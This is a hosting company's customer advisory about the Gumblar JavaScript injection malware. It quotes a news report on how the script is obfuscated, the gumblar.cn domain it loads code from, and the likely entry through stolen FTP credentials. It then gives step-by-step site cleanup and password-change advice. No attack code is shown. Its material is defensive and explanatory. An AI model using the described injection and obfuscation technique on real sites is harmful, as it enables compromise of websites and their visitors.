[Kiwihost]

We have noticed that there has been an increase in the number of websites exploited over the last few weeks, not only websites hosted by Kiwihosting.net, but in many of the hosting forums we follow there has been a large number of other hosting companies also reporting such increases. The following article explains a little more about the current exploit that's been reported most frequently and what you can do to help protect yourself against it.

Whilst at Kiwihosting.net we do everything possible to help protect our servers against exploits the vast majority of sites exploited that we investigate are as a result of

1) Customers running 3rd party software such as Joomla, PHPBB, vBulletin etc and not keeping up to date with new releases
2) Customers having FTP passwords that are weak and easily guessed or bruteforce compromised
3) Customer computers infected with malware/keyloggers or trojans.

For those customers who have not yet moved their sites to our HELM servers we highly encourage you to consider doing so, we run additional software on these servers that helps us to dramatically reduce the attack vectors on the server by blocking any suspicious request or URL received.

We recommend all customers consider running software such as Malwarebytes, and AVAST Anti-virus to help protect your own computers against such intrusions.

http://malwarebytes.org/
http://www.avast.com/

Quote

Malware analysts from security vendor Sophos warn that the number of pages infected with the Gumblar malcious script has recently sky-rocketed, putting the exploit at the top of the list of Web threats. The impact of the previous record setter Mal/Iframe-F now dwarfs in comparison.

According to Sophos, Troj/JSRedir-R, otherwise known as the Gumblar exploit, after the rogue domain it points to, amounts to a whopping 42% of all infections on the Web today. Mal/Iframe-F occupies the second place, its number of infections being six times lower and accounting for only 7%.

"Typically, JSRedir-R is found on legitimate websites, hidden behind obfuscated Javascript, loading malicious content from third-party sites without the user's knowledge. In the below case, the obfuscated script tries to download dangerous code from a site called gumblar.cn," Graham Cluley, Sophos' senior technology consultant, explains.

The obfuscation method used by Gumblar is fairly simple and involves replacing characters with their hexadecimal value, for example " %20 " instead of "empty space," then changing the % with an arbitrary character. The Javascript code includes a replace function at the end, which restores % for the random character.

There are numerous variations of this script in the wild and they can be usually found right before the "body" tag in compromised HTML documents. They all query the gumblar.cn, which is blacklisted by Google, for additional malicious scripts. "Unlike the recent iframe exploits, where the malicious code was only injected into files with most common filenames (e.g. index.html, index.php, etc.) this gumblar script is injected into every web page," the Unmask Parasites blog warns.

Since this script has been found on websites running a variety of PHP applications, it cannot be tied to a particular vulnerability. Instead, compromised FTP credentials might be the point of entry. Paul Baccas, virus researcher at Sophos, attributes the infections to the PHPMod-A Trojan. The payload is also said to change permissions of various directories on the webserver and drop an image.php file into the 'images' folder.

What is also interesting is that the exploit infects different file types with different code. This means that the code inserted into .js files will be different from the one inserted into .php. This is, obviously, required for the malicious code to be executed properly, but the fact that it successfully targets more than .html files makes the threat a lot more dangerous and hard to clean.

If you have reasons to believe that your website has been compromised by this threat, make sure your computer is clean of malware, change the password for your FTP accounts and re-upload the website from a clean back-up.

Reposted From: http://news.softpedi...at-111701.shtml

[Kiwihost]

If you have been infected by the above or similar exploits the best way to clean your website(s) is to delete all of your website(s) files and re-upload your site from the clean copy that you should be maintaining on your local development machine; a practice that every good developer should employ.

WARNING: You MUST change ALL CONTROL PANEL, FTP and FTP SUB-ACCOUNT PASSWORDS!
We have talked with many customers whom have spent hours cleaning their website(s) and did NOT change their passwords; these customers became infected again sometimes within just a matter of hours.

1) Login to your H-Sphere or HELM Control Panel.

2) Click on the File Manager icon. A new window called WebShell will open (HSphere) or File Manager (HELM) and reveal to you a list of the files within your domain (HELM) or all domains under your account (HSphere).

Before procedding further please ensure you have a CURRENT BACKUP saved of your website prior to the exploit occurring

3) Now, start with the first website directory on the list, navigate into it and delete EVERYTHING!

When deleting files there are some folders you may not be able to delete. They are:

aspnet_client/
AWStats/
webalizer/

The aspnet_client folder in most cases will NOT allow you to delete it. This is a system folder that is locked by the server. In most cases, you can delete the FILE contents of this folder and its sub-folders but you will not be able to delete the folder itself.

AWStats and webalizer are folders that contain your website traffic statistics. Please review the files within them for evidence of infections. We highly recommend that you review your stats and then turn off the stats services in the control panel and then delete the folders to be 100% certain about having removed all infected files. You can then turn them back on and your stats will start tracking with a clean slate.

Work on only one website at a time! Once you have successfully deleted every file and folder for a particular website, begin uploading your back-up copy to the server. When all of the files are back on the server, your website should be free of infection and secure behind your new STRONG passwords!

If you have more than one website, move on to the next one.

Other tools you may find usefull are SmartFTP an excellant but now commercial FTP Program, or WS_FTP a completely free FTP program. Both of these programs allow you to search for files within your folders and assist in deleting them.

To date we have discovered the following pattern to the exploits occuring
.htaccess files are uploaded to the root folder and most subfolders, these .htaccess files only work on our HSphere Unix servers and cause your site to redirect to bogus websites. Delete all .htaccess files you find unless you know you have a specific requirement for one, in which case check the existing ones and remove any content that you did not place there yourself.

Default index pages are generally the only pages being injected with the exploit, however we have found some javascript (.js) files also being injected so it's worth checking these also. Default index pages are usually called one of index.php index.htm index.html default.htm default.html index.asp default.asp index.aspx default.aspx depending on the scripting language used on your site. Check each of these for signs of the exploit and remove where the script wherever it's located.

An example of the script you may find being injected into your websites is detailed on the following website: http://blog.unmaskpa...comment-page-1/ this page also contains some other useful removal instructions.